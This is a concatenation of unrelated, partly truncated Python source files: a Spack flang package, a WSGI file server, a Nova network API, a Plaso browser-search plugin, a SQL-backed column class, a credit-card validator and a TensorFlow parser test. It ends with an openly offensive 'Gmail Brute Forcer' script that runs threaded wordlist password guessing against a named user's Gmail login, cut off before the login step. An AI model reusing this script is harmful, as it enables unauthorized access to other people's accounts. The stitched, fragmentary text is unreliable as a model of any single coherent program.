self.compiler.fc_rpath_arg, self.prefix.lib,
self.compiler.fc_rpath_arg,
self.spec['pgmath'].prefix.lib, self.spec.prefix.bin))
out.close()
chmod = which('chmod')
chmod('+x', flang)
def setup_environment(self, spack_env, run_env):
# to find llvm's libc++.so
spack_env.set('LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib)
run_env.set('FC', join_path(self.spec.prefix.bin, 'flang'))
| run_env.set('F77', join_path(self.spec.prefix.bin, 'flang'))
| run_env.set('F90', join_path(self.spec.prefix.bin, 'flang'))
|
ons::
[wsgi_fs]
call = brim.wsgi_fs.WSGIFS
# path = <path>
# The request path to match and serve; any paths that do not begin
# with this value will be passed on to the next WSGI app in the
# chain. Default: /
# serve_path = <path>
# The local file path containing files to serve.
"""
"""Copyright and License.
Copyright 2014 Gregory Holt
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import mimetypes
import os
import time
from cgi import escape
from brim import http
MONTH_ABR = (
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct',
'Nov', 'Dec')
WEEKDAY_ABR = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')
def http_date_time(when):
"""Returns a date and time formatted as per HTTP RFC 2616."""
gmtime = time.gmtime(when)
return '%s, %02d %3s %4d %02d:%02d:%02d GMT' % (
WEEKDAY_ABR[gmtime.tm_wday], gmtime.tm_mday,
MONTH_ABR[gmtime.tm_mon - 1], gmtime.tm_year, gmtime.tm_hour,
gmtime.tm_min, gmtime.tm_sec)
def _openiter(path, chunk_size, total_size):
left = total_size
with open(path, 'rb') as source:
while True:
chunk = source.read(min(chunk_size, left))
if not chunk:
break
left -= len(chunk)
yield chunk
if left >= chunk_size:
chunk = ' ' * chunk_size
while left >= chunk_size:
left -= chunk_size
yield chunk
if left:
yield ' ' * left
class WSGIFS(object):
"""A WSGI app for serving up files from the file system.
See :py:mod:`brim.wsgi_fs` for more information.
:param name: The name of the app.
:param parsed_conf: The conf result from :py:meth:`parse_conf`.
:param next_app: The next WSGI app in the chain.
"""
def __init__(self, name, parsed_conf, next_app):
self.name = name
"""The name of the app."""
self.next_app = next_app
"""The next WSGI app in the chain."""
self.path = parsed_conf['path']
"""The request path to match and serve.
Any paths that do not begin with this value will be passed on to
the next WSGI app in the chain. The attribute will have leading
and trailing foward slashes removed.
"""
self.serve_path = parsed_conf['serve_path']
"""The local file path containing files to serve."""
def __call__(self, env, start_response):
"""Handles incoming WSGI requests.
Requests that start with the configured path simply serve up any
files under the configured location on the file system. Other
requests are passed on to the next WSGI app in the chain.
:param env: The WSGI env as per the spec.
:param start_response: The WSGI start_response as per the spec.
:returns: Calls *start_response* and returns an iterable as per
the WSGI spec.
"""
path = os.path.normpath(env['PATH_INFO'].strip('/'))
if path == self.path:
path = '.'
elif path.startswith(self.path + '/'):
path = path[len(self.path) + 1:]
if not path:
path = '.'
elif self.path:
return self.next_app(env, start_response)
if path == '..' or path.startswith('..' + os.path.sep):
return http.HTTPForbidden()(env, start_response)
path = os.path.join(self.serve_path, path)
if not os.path.exists(path):
return http.HTTPNotFound()(env, start_response)
if os.path.isdir(path):
if not env['PATH_INFO'].endswith('/'):
return http.HTTPMovedPermanently(
headers={'Location': env['PATH_INFO'] + '/'})(
env, start_response)
dirpath = path
path = os.path.join(path, 'index.html')
if not os.path.exists(path):
return self.listing(dirpath, env, start_response)
content_type = mimetypes.guess_type(path)[0] or \
'application/octet-stream'
stat = os.stat(path)
if not stat.st_size:
start_response(
'204 No Content',
[('Content-Length', '0'), ('Content-Type', content_type)])
start_response(
'200 OK',
[('Content-Length', str(stat.st_size)),
('Content-Type', content_type),
('Last-Modified',
http_date_time(min(stat.st_mtime, time.time())))])
if env['REQUEST_METHOD'] == 'HEAD':
return ''
return _openiter(path, 65536, stat.st_size)
def listing(self, path, env, start_response):
if not path.startswith(self.serve_path + '/'):
return http.HTTPForbidden()(env, start_response)
rpath = '/' + self.path + '/' + path[len(self.serve_path) + 1:]
epath = escape(rpath)
body = (
'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 '
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n'
'<html>\n'
' <head>\n'
' <title>Listing of %s</title>\n'
' <style type="text/css">\n'
' h1 {font-size: 1em; font-weight: bold;}\n'
' th {text-align: left; padding: 0px 1em 0px 1em;}\n'
' td {padding: 0px 1em 0px 1em;}\n'
' a {text-decoration: none;}\n'
' .colsize {text-align: right;}\n'
' </style>\n'
' </head>\n'
' <body>\n'
' <h1 id="title">Listing of %s</h1>\n'
' <table id="listing">\n'
' <tr id="heading">\n'
' <th class="colname">Name</th>\n'
' <th class="colsize">Size</th>\n'
' <th class="coldate">Date</th>\n'
' </tr>\n' % (epath, epath))
if env['PATH_INFO'].count('/') > 1:
body += (
' <tr id="parent" class="item">\n'
' <td class="colname"><a href="../">../</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n')
listing = sorted(os.listdir(path))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isdir(itempath):
body += (
' <tr class="item subdir">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n' % (http.quote(item), escape(item)))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isfile(itempath):
ext = os.path.splitext(item)[1].lstrip('.')
size = os.path.getsize(itempath)
mtime = os.path.getmt | ime(itempath)
body += (
' <tr class="item %s">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize">'
'<script type="text/javascript">'
'document.write(new Number(%s).toLocaleString());'
'</script></td>\n'
| ' <td class="coldate">'
'<script type="text/javascript">'
'document.write(new Date(%s * 1000).toLocaleString());'
'</script></td>\n'
' </tr>\n' %
('ext' + ext, http.quote(item), escape(item), size, mtime))
body += (
' </table>\n'
' |
instance,
requested_networks=None):
"""Deallocates all network structures related to instance."""
# NOTE(vish): We can't do the floating ip deallocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
if not isinstance(instance, obj_base.NovaObject):
instance = objects.Instance._from_db_object(context,
objects.Instance(), instance)
self.network_rpcapi.deallocate_for_instance(context, instance=instance,
requested_networks=requested_networks)
# NOTE(danms): Here for neutron compatibility
def allocate_port_for_instance(self, context, instance, port_id,
network_id=None, requested_ip=None):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def deallocate_port_for_instance(self, context, instance, port_id):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def list_ports(self, *args, **kwargs):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def show_port(self, *args, **kwargs):
raise NotImplementedError()
@wrap_check_policy
@base_api.refresh_cache
def add_fixed_ip_to_instance(self, context, instance, network_id):
"""Adds a fixed ip to instance from specified network."""
flavor = flavors.extract_flavor(instance)
args = {'instance_id': instance['uuid'],
'rxtx_factor': flavor['rxtx_factor'],
'host': instance['host'],
'network_id': network_id}
nw_info = self.network_rpcapi.add_fixed_ip_to_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
@base_api.refresh_cache
def remove_fixed_ip_from_instance(self, context, instance, address):
"""Removes a fixed ip from instance from specified network."""
flavor = flavors.extract_flavor(instance)
args = {'instance_id': instance['uuid'],
'rxtx_factor': flavor['rxtx_factor'],
'host': instance['host'],
'address': address}
nw_info = self.network_rpcapi.remove_fixed_ip_from_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def add_network_to_project(self, context, project_id, network_uuid=None):
"""Force adds another network to a project."""
self.network_rpcapi.add_network_to_project(context, project_id,
network_uuid)
@wrap_check_policy
def associate(self, context, network_uuid, host=base_api.SENTINEL,
project=base_api.SENTINEL):
"""Associate or disassociate host or project to network."""
network = self.get(context, network_uuid)
if host is not base_api.SENTINEL:
if host is None:
objects.Network.disassociate(context, network.id,
host=True, project=False)
else:
network.host = host
network.save()
if project is not base_api.SENTINEL:
if project is None:
objects.Network.disassociate(context, network.id,
host=False, project=True)
else:
objects.Network.associate(context, project,
network_id=network.id, force=True)
@wrap_check_policy
def get_instance_nw_info(self, context, instance, **kwargs):
"""Returns all network info related to an instance."""
result = self._get_instance_nw_info(context, instance)
# NOTE(comstud): Don't update API cell with new info_cache every
# time we pull network info for an instance. The periodic healing
# of info_cache causes too many cells messages. Healing the API
# will happen separately.
base_api.update_instance_cache_with_nw_info(self, context, instance,
result, update_cells=False)
return result
def _get_instance_nw_info(s | elf, context, instance):
"""Returns all network info related to an instance."""
flavor = flavors.extract_flavor(instance)
args = {'instance_id': instance['uuid'],
'rxtx_factor': flavor['rxt | x_factor'],
'host': instance['host'],
'project_id': instance['project_id']}
nw_info = self.network_rpcapi.get_instance_nw_info(context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def validate_networks(self, context, requested_networks, num_instances):
"""validate the networks passed at the time of creating
the server.
Return the number of instances that can be successfully allocated
with the requested network configuration.
"""
if requested_networks:
self.network_rpcapi.validate_networks(context,
requested_networks)
# Neutron validation checks and returns how many of num_instances
# instances can be supported by the quota. For Nova network
# this is part of the subsequent quota check, so we just return
# the requested number in this case.
return num_instances
def create_pci_requests_for_sriov_ports(self, context,
pci_requests,
requested_networks):
"""Check requested networks for any SR-IOV port request.
Create a PCI request object for each SR-IOV port, and add it to the
pci_requests object that contains a list of PCI request object.
"""
# This is NOOP for Nova network since it doesn't support SR-IOV.
pass
@wrap_check_policy
def get_instance_uuids_by_ip_filter(self, context, filters):
"""Returns a list of dicts in the form of
{'instance_uuid': uuid, 'ip': ip} that matched the ip_filter
"""
return self.network_rpcapi.get_instance_uuids_by_ip_filter(context,
filters)
@wrap_check_policy
def get_dns_domains(self, context):
"""Returns a list of available dns domains.
These can be used to create DNS entries for floating ips.
"""
return self.network_rpcapi.get_dns_domains(context)
@wrap_check_policy
def add_dns_entry(self, context, address, name, dns_type, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'dns_type': dns_type,
'domain': domain}
return self.network_rpcapi.add_dns_entry(context, **args)
@wrap_check_policy
def modify_dns_entry(self, context, name, address, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'domain': domain}
return self.network_rpcapi.modify_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_entry(self, context, name, domain):
"""Delete the specified dns entry."""
args = {'name': name, 'domain': domain}
return self.network_rpcapi.delete_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_domain(self, context, domain):
"""Delete the specified dns domain."""
return self.network_rpcapi.delete_dns_domain(context, domain=domain)
@wrap_check_policy
def get_dns_entries_by_address(self, context, address, domain):
"""Get entries for address and domain."""
args = {'address': address, 'domain': domain}
return self.network_rpcapi.get_dns_entries_by_address(context, **args)
@wrap_check_policy
def get_dns_entries_by_name(self, context, |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A plugin that extracts browser history from events."""
import collections
import logging
import urllib
from plaso import filters
from plaso.analysis import interface
from plaso.lib import event
from plaso.lib import eventdata
def ScrubLine(line):
"""Scrub the line of most obvious HTML codes.
An attempt at taking a line and swapping all instances
of %XX which represent a character in hex with it's
unicode character.
Args:
line: The string that we are about to "fix".
Returns:
String that has it's %XX hex codes swapped for text.
"""
if not line:
return ''
try:
return unicode(urllib.unquote(str(line)), 'utf-8')
except UnicodeDecodeError:
logging.warning(u'Unable to decode line: {0:s}'.format(line))
return line
class FilterClass(object):
"""A class that contains all the parser functions."""
@classmethod
def _GetBetweenQEqualsAndAmbersand(cls, string):
"""Return back string that is defined 'q=' and '&'."""
if 'q=' not in string:
return string
_, _, line = string.partition('q=')
before_and, _, _ = line.partition('&')
if not before_and:
return line
return before_and.split()[0]
@classmethod
def _SearchAndQInLine(cls, string):
"""Return a bool indicating if the words q= and search appear in string."""
return 'search' in string and 'q=' in string
@classmethod
def GoogleSearch(cls, url):
"""Return back the extracted string."""
if not cls._SearchAndQInLine(url):
return
line = cls._GetBetweenQEqualsAndAmbersand(url)
if not line:
return
return line.replace('+', ' ')
@classmethod
def YouTube(cls, url):
"""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def BingSearch(cls, url):
"""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def GenericSearch(cls, url):
"""Return back the extracted string from a generic search engine."""
if not cls._SearchAndQInLine(url):
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Yandex(cls, url):
"""Return back the results from Yandex search engine."""
if 'text=' not in url:
return
_, _, line = url.partition('text=')
before_and, _, _ = line.partition('&')
if not before_and:
return
yandex_search_url = before_and.split()[0]
return yandex_search_url.replace('+', ' ')
@classmethod
def DuckDuckGo(cls, url):
"""Return back the extracted string."""
if not 'q=' in url:
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Gmail(cls, url):
"""Return back the extracted string."""
if 'search/' not in url:
return
_, _, line = url.partition('search/')
first, _, _ = line.partition('/')
second, _, _ = first.partition('?compose')
return second.replace('+', ' ')
class AnalyzeBrowserSearchPlugin(interface.AnalysisPlugin):
"""Analyze browser search entries from events."""
NAME = 'browser_search'
# Indicate that we do not want to run this plugin during regular extraction.
ENABLE_IN_EXTRACTION = False
# Here we define filters and callback methods for all hits on each filter.
FILTERS = (
(('url iregexp "(www.|encrypted.|/)google." and url contains "search"'),
'GoogleSearch'),
('url contains "youtube.com"', 'YouTube'),
(('source is "WEBHIST" and url contains "bing.com" and url contains '
'"search"'), 'BingSearch'),
('url contains "mail.google.com"', 'Gmail'),
(('source is "WEBHIST" and url contains "yandex.com" and url contains '
'"yandsearch"'), 'Yandex'),
('url contains "duckduckgo.com"', 'DuckDuckGo')
)
def __init__(self, pre_obj, incoming_queue, outgoing_queue):
"""Constructor for the browser history plugin."""
super(AnalyzeBrowserSearchPlugin, self).__init__(
pre_obj, incoming_queue, outgoing_queue)
self._filter_dict = {}
self._counter = collections.Counter()
for filter_str, call_back in self.FILTERS:
filter_obj = filters.GetFilter(filter_str)
call_back_obj = getattr(FilterClass, call_back, None)
if filter_obj and call_back_obj:
self._filter_dict[filter_obj] = (call_back, call_back_obj)
def ExamineEvent(self, event_object):
"""Take a | n EventObject a | nd send it through analysis."""
# This event requires an URL attribute.
url_attribute = getattr(event_object, 'url', None)
if not url_attribute:
return
# Check if we are dealing with a web history event.
source, _ = eventdata.EventFormatterManager.GetSourceStrings(event_object)
if source != 'WEBHIST':
return
for filter_obj, call_backs in self._filter_dict.items():
call_back_name, call_back_object = call_backs
if filter_obj.Match(event_object):
returned_line = ScrubLine(call_back_object(url_attribute))
if not returned_line:
continue
self._counter[u'{}:{}'.format(call_back_name, returned_line)] += 1
def CompileReport(self):
"""Compiles a report of the analysis.
Returns:
The analysis report (instance of AnalysisReport).
"""
report = event.AnalysisReport()
results = {}
for key, count in self._counter.iteritems():
search_engine, _, search_term = key.partition(':')
results.setdefault(search_engine, {})
results[search_engine][search_term] = count
report.report_dict = results
lines_of_text = []
for search_engine, terms in sorted(results.items()):
lines_of_text.append(u' == ENGINE: {0:s} =='.format(search_engine))
for search_term, count in sorted(
terms.iteritems(), key=lambda x: (x[1], x[0]), reverse=True):
lines_of_text.append(u'{0:d} {1:s}'.format(count, search_term))
# An empty string is added to have SetText create an empty line.
lines_of_text.append(u'')
report.SetText(lines_of_text)
return report
|
sort_values>`_.
:param int|None limit: Either a positive integer for the number of rows to take or ``None`` to take all.
:param bool ascending: Sort ascending vs descending.
:param dict sql_kwargs: A dictionary of keyword arguments passed into `pandas.read_sql <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_sql.html>`_.
:return: The resulting series.
:rtype: pandas.Series
"""
if limit is not None and (not isinstance(limit, int) or limit <= 0):
raise ValueError("limit must be a positive integer or None (got {})".format(limit))
sql = self.select_all_query() + " order by 1"
if not ascending:
sql += " desc"
if limit is not None:
sql += " limit {}".format(limit)
return pd.read_sql(sql, self.parent_table.conn, **sql_kwargs)[self.name]
def unique(self):
"""
Returns an array of unique values in this column. Includes ``null`` (represented as ``None``).
:return: The unique values.
:rtype: np.array
"""
cur = self.parent_table.conn.cursor()
cur.execute("select distinct {} from {}".format(self, self.parent_table))
return np.array([x[0] for x in cur.fetchall()])
def hist(self, **kwargs):
return self.plot.hist(**kwargs)
def head(self, num_rows=10):
"""
Fetches some values of this column.
:param int|str num_rows: Either a positive integer number of values or the string `"all"` to fetch all values
:return: A NumPy array of the values
:rtype: np.array
"""
if (isinstance(num_rows, int) and num_rows < 0) or \
num_rows != "all":
raise ValueError("num_rows must be a positive integer or the string 'all'")
query = self.select_all_query()
if num_rows != "all":
query += " limit {}".format(num_rows)
cur = self.parent_table.conn.cursor()
cur.execute(query)
return np.array([x[0] for x in cur.fetchall()])
@LazyProperty
def is_unique(self):
"""
Determines whether or not the values of this column are all unique (ie whether this column is a unique identifier for the table).
:return: Whether or not this column contains unique values.
:rtype: bool
"""
cur = self.parent_table.conn.cursor()
cur.execute("""select {}
from {}
group by 1 having count(1) > 1""".format(self, self.parent_table))
return cur.fetchone() is None
@LazyProperty
def dtype(self):
"""
The ``dtype`` of this column (represented as a string).
:return: The ``dtype``.
:rtype: str
"""
return self.parent_table._all_column_data_types[self.name]
def _get_describe_query(self, percentiles=None, type_="continuous"):
if type_.lower() not in ["continuous", "discrete"]:
raise ValueError("The 'type_' parameter must be 'continuous' or 'discrete'")
if not self.is_numeric:
return None
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
elif not bool(percentiles):
percentiles = []
if not isinstance(percentiles, (list, tuple)):
percentiles = [percentiles]
if any([x < 0 or x > 1 for x in percentiles]):
raise ValueError(
"The `percentiles` attribute must be None or consist of numbers between 0 and 1 (got {})".format(
percentiles))
percentiles = sorted([float("{0:.2f}".format(p)) for p in percentiles if p > 0])
suffix = "cont" if type_.lower() == "continuous" else "desc"
query = _describe_template.render(column=self, percentiles=percentiles,
suffix=suffix, table=self.parent_table)
if self.parent_table.debug:
_pretty_print(query)
return query
def describe(self, percentiles=None, type_="continuous"):
"""
This mocks the method `pandas.Series.describe`, and provides
a series with the same data (just calculated by the database).
:param None|list[float] percentiles: A list of percentiles to evaluate (with numbers between 0 and 1). If not specified, quartiles (0.25, 0.5, 0.75) are used.
:param str type_: Specifies whether the percentiles are to be taken as discrete or continuous. Must be one of `"discrete"` or `"continuous"`.
:return: A series returning the description of the column, in the same format as ``pandas.Series.describe``.
:rtype: pandas.Series
"""
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
cur = self.parent_table.conn.cursor()
cur.execute(self._get_describe_query(percentiles=percentiles, type_=type_))
index = ["count", "mean", "std_dev", "minimum"] + \
["{}%".format(int(100 * p)) for p in percentiles] + \
["maximum"]
return pd.Series(cur.fetchone()[1:], index=index)
@seaborn_required
def distplot(self, bins=None, **kwargs):
"""
Produces a ``distplot``. See `the seaborn docs <http://stanford.edu/~mwaskom/software/seaborn/generated/ | seaborn.distplot.html>`_ on ``distplot`` for more information.
Note that this requires Seaborn in order to function. |
:param int|None bins: The number of bins to use. If unspecified, the `Freedman-Diaconis rule <https://en.wikipedia.org/wiki/Freedman%E2%80%93Diaconis_rule>`_ will be used to determine the number of bins.
:param dict kwargs: A dictionary of options to pass on to `seaborn.distplot <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_.
"""
import seaborn
bc = bin_counts.counts(self, bins=bins)
n = sum([entry[2] for entry in bc])
left = np.zeros(n)
right = np.zeros(n)
overall_index = 0
for entry in bc:
for i in range(entry[2]):
left[overall_index] = entry[0]
right[overall_index] = entry[1]
overall_index += 1
# We'll take our overall data points to be in the midpoint
# of each binning interval
# TODO: make this more configurable (left, right, etc)
return seaborn.distplot((left + right) / 2.0, **kwargs)
@LazyProperty
def values(self):
"""
Mocks the method `pandas.Series.values`, returning a simple NumPy array
consisting of the values of this column.
:return: The NumPy array containing the values.
:rtype: np.array
"""
cur = self.parent_table.conn.cursor()
cur.execute(self.select_all_query())
return np.array([x[0] for x in cur.fetchall()])
def _calculate_aggregate(self, aggregate):
query = "select {}({}) from (\n{}\n)a".format(
aggregate, self, self.select_all_query())
cur = self.parent_table.conn.cursor()
cur.execute(query)
return cur.fetchone()[0]
@LazyProperty
def mean(self):
"""
Mocks the ``pandas.Series.mean`` method to give the mean of the values in this column.
:return: The mean.
:rtype: float
"""
return self._calculate_aggregate("avg")
@LazyProperty
def max(self):
"""
Mocks the ``pandas.Series.max`` method to give the maximum of the values in this column.
:return: The maximum.
:rtype: float
"""
return self._calculate_aggregate("max")
@LazyProperty
def min(self):
"""
Mocks the ``pandas.Series.min`` method to give the maximum of the values in this column.
:return: The minimum.
:rtype: float
"""
return self._calculate_aggregate("min")
@LazyProperty
def size(self):
"""
Mocks the ``pandas.Series.size`` property to give a count of the values in this column.
:return: The count.
:rtype: int
"""
return self.parent_table |
import re
from calendar import monthrange
import datetime
class Card(object):
"""
A credit card that may be valid or invalid.
"""
# A regexp for matching non-digit values
non_digit_regexp = re.compile(r'\D')
# A mapping from common credit card brands to their number regexps
BRAND_VISA = 'visa'
BRAND_MASTERCARD = 'mastercard'
BRAND_AMEX = 'amex'
BRAND_DISCOVER = 'discover'
BRAND_DANKORT = 'dankort'
BRAND_MAESTRO = 'maestro'
BRAND_DINERS = 'diners'
BRAND_UNKNOWN = u'unknown'
BRANDS = {
BRAND_VISA: re.compile(r'^4\d{12}(\d{3})?$'),
BRAND_MASTERCARD: re.compile(r'''
^(5[1-5]\d{4}|677189)\d{10}$| # Traditional 5-series + RU support
^(222[1-9]|2[3-6]\d{2}|27[0-1]\d|2720)\d{12}$ # 2016 2-series
''', re.VERBOSE),
BRAND_AMEX: re.compile(r'^3[47]\d{13}$'),
BRAND_DISCOVER: re.compile(r'^(6011|65\d{2})\d{12}$'),
BRAND_DANKORT: re.compile(r'^(5019)\d{12}$'),
BRAND_MAESTRO:
re.compile(r'^(?:5[0678]\d\d|6304|6390|67\d\d)\d{8,15}$'),
BRAND_DINERS:
re.compile(r'^3(?:0[0-5]|[68][0-9])[0-9]{11}$'),
}
FRIENDLY_BRANDS = {
BRAND_VISA: 'Visa',
BRAND_MASTERCARD: 'MasterCard',
BRAND_AMEX: 'American Express',
BRAND_DISCOVER: 'Discover',
BRAND_DANKORT: 'Dankort',
BRAND_MAESTRO: 'Maestro',
BRAND_DINERS: 'Diners Club',
}
# Common test credit cards
TESTS = (
'4444333322221111',
'378282246310005',
'371449635398431',
'378734493671000',
'30569309025904',
'38520000023237',
'6011111111111117',
'6011000990139424',
'555555555554444',
'5105105105105100',
'4111111111111111',
'4012888888881881',
'4222222222222',
)
# Stripe test credit cards
TESTS += (
'4242424242424242',
)
def __init__(self, number, month, year, cvc, holder=None):
"""
Attaches the provided card data and holder to the card after removing
non-digits from the provided number.
"""
self.number = self.non_digit_regexp.sub('', number)
self.exp_date = ExpDate(month, year)
self.cvc = cvc
self.holder = holder
def __repr__(self):
"""
Returns a typical repr with a simple representation of the masked card
number and the exp date.
"""
return u'<Card brand={b} number={n}, exp_date={e}>'.format(
b=self.brand,
n=self.mask,
e=self.exp_date.mmyyyy
)
@property
def mask(self):
"""
Returns the credit card number with each of the number's digits but the
first six and the last four digits replaced by an X, formatted the way
they appear on their respective brands' cards.
"""
# If the card is invalid, return an "invalid" message
if not self.is_mod10_valid:
return u'invalid'
# If the card is an Amex, it will have special formatting
if self.brand == self.BRAND_AMEX:
return u'XXXX-XXXXXX-X{e}'.format(e=self.number[11:15])
# All other cards
return u'XXXX-XXXX-XXXX-{e}'.format(e=self.number[12:16])
@property
def brand(self):
"""
Returns the brand of the card, if applicable, else an "unknown" brand.
"""
# Check if the card is of known type
for brand, regexp in self.BRANDS.items():
if regexp.match(self.number):
return brand
# Default to unknown brand
return self.BRAND_UNKNOWN
@property
def friendly_brand(self):
"""
Returns the human-friendly brand name of the card.
"""
return self.FRIENDLY_BRANDS.get(self.brand, 'unknown')
@property
def is_test(self):
"""
Returns whether or not the card's number is a known test number.
"""
return self.number in self.TESTS
@property
def is_expired(self):
"""
Returns whether or not the card is expired.
"""
return self.exp_date.is_expired
@property
def is_valid(self):
"""
Returns whether or not the card is a valid card for making payments.
"""
return not self.is_expired and self.is_mod10_valid
@property
def is_mod10_valid(self):
"""
Returns whether or not the card's number validates against the mod10
algorithm (Luhn algorithm), automatically returning False on an empty
value.
"""
# Check for empty string
if not self.number:
return False
# Run mod10 on the number
dub, tot = 0, 0
for i in range(len(self.number) - 1, -1, -1):
for c in str((dub + 1) * int(self.number[i])):
tot += int(c)
dub = (dub + 1) % 2
return (tot % 10) == 0
class ExpDate(object):
"""
An expiration date of a credit card.
"""
def __init__(self, month, year):
"""
Attaches the last possible datetime for the | given month and year, as
well as the raw month and year values.
"""
# Attach month and year
self.month = month
self.year = year
# Get the month's day count
weekday, day_count = monthrange(year, month)
# Attach the last possible datetime for the provided month and year
self.expired_after = datetime.datetime(
year,
month,
day_coun | t,
23,
59,
59,
999999
)
def __repr__(self):
"""
Returns a typical repr with a simple representation of the exp date.
"""
return u'<ExpDate expired_after={d}>'.format(
d=self.expired_after.strftime('%m/%Y')
)
@property
def is_expired(self):
"""
Returns whether or not the expiration date has passed in American Samoa
(the last timezone).
"""
# Get the current datetime in UTC
utcnow = datetime.datetime.utcnow()
# Get the datetime minus 11 hours (Samoa is UTC-11)
samoa_now = utcnow - datetime.timedelta(hours=11)
# Return whether the exipred after time has passed in American Samoa
return samoa_now > self.expired_after
@property
def mmyyyy(self):
"""
Returns the expiration date in MM/YYYY format.
"""
return self.expired_after.strftime('%m/%Y')
@property
def mmyy(self):
"""
Returns the expiration date in MM/YY format (the same as is printed on
cards.
"""
return self.expired_after.strftime('%m/%y')
@property
def MMYY(self):
"""
Returns the expiration date in MMYY format
"""
return self.expired_after.strftime('%m%y')
@property
def mm(self):
"""
Returns the expiration date in MM format.
"""
return self.expired_after.strftime('%m')
@property
def yyyy(self):
"""
Returns the expiration date in YYYY format.
"""
return self.expired_after.strftime('%Y')
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicab | le law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======== | ======================================================================
"""Tests for parser module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import textwrap
from tensorflow.contrib.autograph.pyct import parser
from tensorflow.python.platform import test
class ParserTest(test.TestCase):
def test_parse_entity(self):
def f(x):
return x + 1
mod, _ = parser.parse_entity(f)
self.assertEqual('f', mod.body[0].name)
def test_parse_str(self):
mod = parser.parse_str(
textwrap.dedent("""
def f(x):
return x + 1
"""))
self.assertEqual('f', mod.body[0].name)
def test_parse_expression(self):
node = parser.parse_expression('a.b')
self.assertEqual('a', node.value.id)
self.assertEqual('b', node.attr)
if __name__ == '__main__':
test.main()
|
#!usr/bin/python
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
prin | t "Usage: ./gmailbrute.py <user> <wordlist>"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[ | +] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
